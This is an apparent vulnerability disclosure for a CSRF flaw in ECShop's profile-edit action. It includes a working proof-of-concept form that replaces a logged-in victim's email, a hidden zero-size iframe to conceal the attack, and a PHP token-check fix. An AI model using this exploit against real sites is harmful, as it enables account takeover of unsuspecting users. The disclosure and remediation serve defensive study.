The personal-information edit form does not carry or verify a random token, so a specially crafted form can force a logged-in user to change the email address on their account and thereby hijack it. To hijack the account, you only need to trick the target user into clicking a link.
<!-- POC.htm: auto-submitting cross-site form against the profile-edit action -->
<form id="csrf" action="http://127.0.0.1/ecshop/user.php" method="POST">
  <!-- attacker-controlled email address that replaces the victim's -->
  <input type="hidden" name="email" value="root@wooyun.org">
  <!-- remaining profile fields, filled with arbitrary values so the form validates -->
  <input type="hidden" name="extend_field1" value="x@x.com">
  <input type="hidden" name="extend_field2" value="123123">
  <input type="hidden" name="extend_field3" value="11111111">
  <input type="hidden" name="extend_field4" value="11111111">
  <input type="hidden" name="extend_field5" value="11111111111">
  <input type="hidden" name="sel_question" value="friend_birthday">
  <input type="hidden" name="passwd_answer" value="x">
  <!-- the action that saves the profile -->
  <input type="hidden" name="act" value="act_edit_profile">
</form>
<!-- submit as soon as the page loads; the browser attaches the victim's session cookie -->
<script>csrf.submit()</script>
When a logged-in user opens this page, the browser submits the form automatically with the user's session cookie attached, and the account's email address is changed.
Before the page is opened the profile still holds the original email address; after the page is opened and the form submits itself, the victim is shown the "profile modified" result page, which is clearly not what they expected and gives the attack away. So, to be thorough, prepare an ordinary-looking page (a news page, for example) and load the POC into it through an iframe with height = 0 and width = 0; the form is then submitted invisibly and the user is hijacked without noticing. The code is as follows:
<iframe src="POC.htm" height="0" width="0"></iframe>
Once the email address has been hijacked, you can go on to change the password.
Solution:
Every operation that modifies user information should carry a random, per-session token that the server verifies before processing the request; a request that lacks the token, or carries one that does not match the session, must be rejected.
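The following is an added example, not ECShop's own code, showing how the act_edit_profile handler could issue and verify such a token. Only the act=act_edit_profile and email fields come from the report; the csrf_token field, the csrf_token()/csrf_check() helpers and the commented-out update_email() call are assumptions for illustration.

```php
<?php
// Added example (not ECShop code): issue a per-session random token and verify
// it before changing the email address. Field and helper names are assumed.
session_start();

// Issue one random token per session; the attacker's page cannot read it
// because the same-origin policy prevents cross-site pages from reading
// the legitimate form's contents.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session's token in constant time.
// Returns false when the session has no token, the field is absent, or it
// is not a string (e.g. csrf_token[]=x sent as an array).
function csrf_check($submitted): bool {
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if (($_POST['act'] ?? '') === 'act_edit_profile') {
    // VULNERABLE (as in the report): the session cookie alone authenticates
    // the request, so a cross-site auto-submitting form is accepted.
    // update_email($_SESSION['user_id'], $_POST['email']);  // hypothetical helper

    // FIXED: refuse any state change that does not carry the session's token.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // update_email($_SESSION['user_id'], $_POST['email']);  // hypothetical helper
    exit('Profile updated');
}

// Render the legitimate edit form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form action="user.php" method="POST">'
   . '<input type="hidden" name="act" value="act_edit_profile">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input type="email" name="email">'
   . '<button type="submit">Save</button>'
   . '</form>';
```

With this check in place the POC above still submits, but without a valid csrf_token the server returns 403 and the email address is left unchanged. The same check has to be applied to every state-changing action (password change, address book, orders), not only to act_edit_profile, since any unprotected action can be forged the same way.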